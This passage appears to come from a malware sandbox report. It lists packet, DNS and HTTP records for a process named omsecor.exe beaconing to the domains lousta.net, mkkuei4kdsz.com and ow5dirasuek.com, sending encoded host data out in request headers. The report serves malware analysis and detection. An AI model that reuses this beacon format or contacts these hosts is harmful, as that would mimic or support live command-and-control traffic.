Nov 1, 2024 16:04:44.062441111 CET	49747	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:44.062597036 CET	49747	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:44.067379951 CET	80	49747	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:44.887509108 CET	80	49747	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:44.887600899 CET	49747	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:44.888129950 CET	49747	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:44.893270016 CET	80	49747	52.34.198.229	192.168.2.4
Nov 1, 2024 16:04:44.893336058 CET	49747	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:04:45.103720903 CET	49742	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:04:45.123301983 CET	49748	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:45.128223896 CET	80	49748	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:45.128294945 CET	49748	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:45.128473997 CET	49748	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:45.133254051 CET	80	49748	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:53.613965034 CET	80	49748	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:53.615772963 CET	49748	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:53.615869045 CET	49748	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:53.620743990 CET	80	49748	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:53.729649067 CET	49798	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:53.734646082 CET	80	49798	193.166.255.171	192.168.2.4
Nov 1, 2024 16:04:53.734733105 CET	49798	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:53.735132933 CET	49798	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:04:53.739912987 CET	80	49798	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:02.221141100 CET	80	49798	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:02.221230984 CET	49798	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:02.221318007 CET	49798	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:02.226123095 CET	80	49798	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:02.334348917 CET	49838	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:02.339236975 CET	80	49838	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:02.339303970 CET	49838	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:02.340269089 CET	49838	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:02.345158100 CET	80	49838	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:03.027405024 CET	80	49838	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:03.027476072 CET	49838	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:03.137872934 CET	49844	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:03.142764091 CET	80	49844	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:03.142870903 CET	49844	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:03.143146038 CET	49844	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:03.148029089 CET	80	49844	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:03.976630926 CET	80	49844	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:03.976731062 CET	49844	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:03.980524063 CET	49844	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:03.986705065 CET	80	49844	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:03.986763954 CET	49844	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:04.198474884 CET	49851	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:04.203375101 CET	80	49851	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:04.203471899 CET	49851	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:04.203615904 CET	49851	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:04.208555937 CET	80	49851	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:12.687202930 CET	80	49851	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:12.687294960 CET	49851	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:12.687395096 CET	49851	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:12.692368984 CET	80	49851	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:12.792388916 CET	49899	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:12.797333956 CET	80	49899	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:12.797557116 CET	49899	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:12.797590971 CET	49899	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:12.802598000 CET	80	49899	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:21.282504082 CET	80	49899	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:21.282608986 CET	49899	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:21.282733917 CET	49899	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:21.287530899 CET	80	49899	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:21.386032104 CET	49838	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:21.386531115 CET	49945	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:21.391633987 CET	80	49838	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:21.391721010 CET	49838	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:21.392949104 CET	80	49945	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:21.393035889 CET	49945	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:21.393177986 CET	49945	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:21.398504019 CET	80	49945	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:22.052130938 CET	80	49945	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:22.052289009 CET	49945	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:22.167193890 CET	49951	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:22.172569036 CET	80	49951	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:22.172746897 CET	49951	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:22.173016071 CET	49951	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:22.178832054 CET	80	49951	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:23.012407064 CET	80	49951	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:23.012530088 CET	49951	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:23.013237953 CET	49951	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:23.018802881 CET	80	49951	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:23.018893003 CET	49951	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:23.229825020 CET	49958	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:23.238070011 CET	80	49958	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:23.238224983 CET	49958	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:23.238634109 CET	49958	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:23.244151115 CET	80	49958	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:31.722382069 CET	80	49958	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:31.722522974 CET	49958	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:31.722634077 CET	49958	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:31.727435112 CET	80	49958	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:31.838958979 CET	50008	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:31.845743895 CET	80	50008	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:31.845837116 CET	50008	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:31.846018076 CET	50008	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:31.851963043 CET	80	50008	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:40.335864067 CET	80	50008	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:40.336101055 CET	50008	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:40.336170912 CET	50008	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:40.341495991 CET	80	50008	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:40.448610067 CET	49945	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:40.449044943 CET	50023	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:40.453923941 CET	80	50023	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:40.454004049 CET	50023	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:40.454207897 CET	50023	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:40.454869986 CET	80	49945	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:40.454924107 CET	49945	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:40.459256887 CET	80	50023	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:41.083230019 CET	80	50023	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:41.083380938 CET	50023	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:41.201288939 CET	50024	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:41.212498903 CET	80	50024	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:41.212618113 CET	50024	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:41.215163946 CET	50024	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:41.224436045 CET	80	50024	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:42.038714886 CET	80	50024	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:42.038840055 CET	50024	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:42.039679050 CET	50024	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:42.044687986 CET	80	50024	52.34.198.229	192.168.2.4
Nov 1, 2024 16:05:42.044792891 CET	50024	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:05:42.261265993 CET	50025	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:42.266331911 CET	80	50025	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:42.266438961 CET	50025	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:42.266555071 CET	50025	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:42.271780968 CET	80	50025	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:50.745245934 CET	80	50025	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:50.745369911 CET	50025	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:50.745531082 CET	50025	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:50.750504971 CET	80	50025	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:50.855205059 CET	50026	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:50.861541033 CET	80	50026	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:50.861622095 CET	50026	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:50.861746073 CET	50026	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:50.869232893 CET	80	50026	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:59.370419979 CET	80	50026	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:59.370565891 CET	50026	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:59.370655060 CET	50026	80	192.168.2.4	193.166.255.171
Nov 1, 2024 16:05:59.402772903 CET	80	50026	193.166.255.171	192.168.2.4
Nov 1, 2024 16:05:59.480148077 CET	50023	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:59.480525017 CET	50027	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:59.522804976 CET	80	50027	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:59.522862911 CET	80	50023	15.197.204.56	192.168.2.4
Nov 1, 2024 16:05:59.523039103 CET	50023	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:59.523369074 CET	50027	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:59.523369074 CET	50027	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:05:59.548515081 CET	80	50027	15.197.204.56	192.168.2.4
Nov 1, 2024 16:06:00.210562944 CET	80	50027	15.197.204.56	192.168.2.4
Nov 1, 2024 16:06:00.210737944 CET	50027	80	192.168.2.4	15.197.204.56
Nov 1, 2024 16:06:00.323729038 CET	50028	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:06:00.351454020 CET	80	50028	52.34.198.229	192.168.2.4
Nov 1, 2024 16:06:00.351545095 CET	50028	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:06:00.351746082 CET	50028	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:06:00.391036987 CET	80	50028	52.34.198.229	192.168.2.4
Nov 1, 2024 16:06:01.423464060 CET	80	50028	52.34.198.229	192.168.2.4
Nov 1, 2024 16:06:01.423576117 CET	50028	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:06:01.424287081 CET	50028	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:06:01.425427914 CET	80	50028	52.34.198.229	192.168.2.4
Nov 1, 2024 16:06:01.425478935 CET	50028	80	192.168.2.4	52.34.198.229
Nov 1, 2024 16:06:01.435884953 CET	80	50028	52.34.198.229	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 16:03:55.460974932 CET	63740	53	192.168.2.4	1.1.1.1
Nov 1, 2024 16:03:55.493470907 CET	53	63740	1.1.1.1	192.168.2.4
Nov 1, 2024 16:04:05.232973099 CET	63062	53	192.168.2.4	1.1.1.1
Nov 1, 2024 16:04:05.242806911 CET	53	63062	1.1.1.1	192.168.2.4
Nov 1, 2024 16:04:05.997051954 CET	56644	53	192.168.2.4	1.1.1.1
Nov 1, 2024 16:04:06.344995022 CET	53	56644	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 16:03:55.460974932 CET	192.168.2.4	1.1.1.1	0x71f1	Standard query (0)	lousta.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 16:04:05.232973099 CET	192.168.2.4	1.1.1.1	0x66ca	Standard query (0)	mkkuei4kdsz.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 16:04:05.997051954 CET	192.168.2.4	1.1.1.1	0x7c95	Standard query (0)	ow5dirasuek.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 16:03:55.493470907 CET	1.1.1.1	192.168.2.4	0x71f1	No error (0)	lousta.net	193.166.255.171	A (IP address)	IN (0x0001)	false
Nov 1, 2024 16:04:05.242806911 CET	1.1.1.1	192.168.2.4	0x66ca	No error (0)	mkkuei4kdsz.com	15.197.204.56	A (IP address)	IN (0x0001)	false
Nov 1, 2024 16:04:05.242806911 CET	1.1.1.1	192.168.2.4	0x66ca	No error (0)	mkkuei4kdsz.com	3.33.243.145	A (IP address)	IN (0x0001)	false
Nov 1, 2024 16:04:06.344995022 CET	1.1.1.1	192.168.2.4	0x7c95	No error (0)	ow5dirasuek.com	52.34.198.229	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lousta.net

mkkuei4kdsz.com

ow5dirasuek.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.166.255.171	80	6792	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:03:55.547741890 CET	185	OUT	GET /875/87.html HTTP/1.1 From: 133749470339604713 Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	193.166.255.171	80	6792	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:03:56.655287981 CET	186	OUT	GET /740/238.html HTTP/1.1 From: 133749470339604713 Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	15.197.204.56	80	6792	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:05.250096083 CET	191	OUT	GET /516/243.html HTTP/1.1 From: 133749470339604713 Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67 Host: mkkuei4kdsz.com Connection: Keep-Alive
Nov 1, 2024 16:04:05.884797096 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 15:04:05 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	52.34.198.229	80	6792	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:06.351166964 CET	191	OUT	GET /546/102.html HTTP/1.1 From: 133749470339604713 Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>a5:57d5ed^d3-42.431c5-a7cc8^9g67 Host: ow5dirasuek.com Connection: Keep-Alive
Nov 1, 2024 16:04:07.185451984 CET	419	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 15:04:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	193.166.255.171	80	6524	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:07.439101934 CET	186	OUT	GET /497/157.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	193.166.255.171	80	6524	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:16.034172058 CET	186	OUT	GET /527/338.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	15.197.204.56	80	6524	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:24.661830902 CET	191	OUT	GET /457/998.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: mkkuei4kdsz.com Connection: Keep-Alive
Nov 1, 2024 16:04:25.293509960 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 15:04:25 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
Nov 1, 2024 16:04:43.785203934 CET	191	OUT	GET /781/119.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: mkkuei4kdsz.com Connection: Keep-Alive
Nov 1, 2024 16:04:43.943324089 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 15:04:43 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	52.34.198.229	80	6524	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:25.409394979 CET	302	OUT	GET /434/722.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m900,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473447\|1730473447\|0\|1\|0
Nov 1, 2024 16:04:26.234617949 CET	339	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 15:04:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	193.166.255.171	80	6524	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:26.361087084 CET	185	OUT	GET /78/665.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	193.166.255.171	80	6524	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:34.968975067 CET	186	OUT	GET /956/959.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	52.34.198.229	80	6524	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:44.062597036 CET	302	OUT	GET /945/466.html HTTP/1.1 From: 133749470461635988 Via: ckmfeqmZqer<7,4^_nda<5Zoan`m910,/0/1^kr=210-]kax=`4946c4dc]c2,31-320b4,`6bb7]8f56 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473466\|1730473447\|9\|2\|0
Nov 1, 2024 16:04:44.887509108 CET	340	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 15:04:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:45.128473997 CET	161	OUT	GET /547/467.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49798	193.166.255.171	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:04:53.735132933 CET	161	OUT	GET /528/262.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49838	15.197.204.56	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:02.340269089 CET	166	OUT	GET /353/421.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93 Host: mkkuei4kdsz.com Connection: Keep-Alive
Nov 1, 2024 16:05:03.027405024 CET	259	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 15:05:02 GMT Content-Type: text/html Content-Length: 114 Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49844	52.34.198.229	80	764	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 16:05:03.143146038 CET	278	OUT	GET /537/167.html HTTP/1.1 From: 133749470461635988 Via: jka^ndv9601]oo<6./1Zjeu<d1883b8aba`10001014_30]5f_6a5e93 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473484\|1730473447\|13\|3\|0
Nov 1, 2024 16:05:03.976630926 CET	340	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 15:05:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50\|173.254.250.82\|1730473503\|1730473447\|16\|4\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
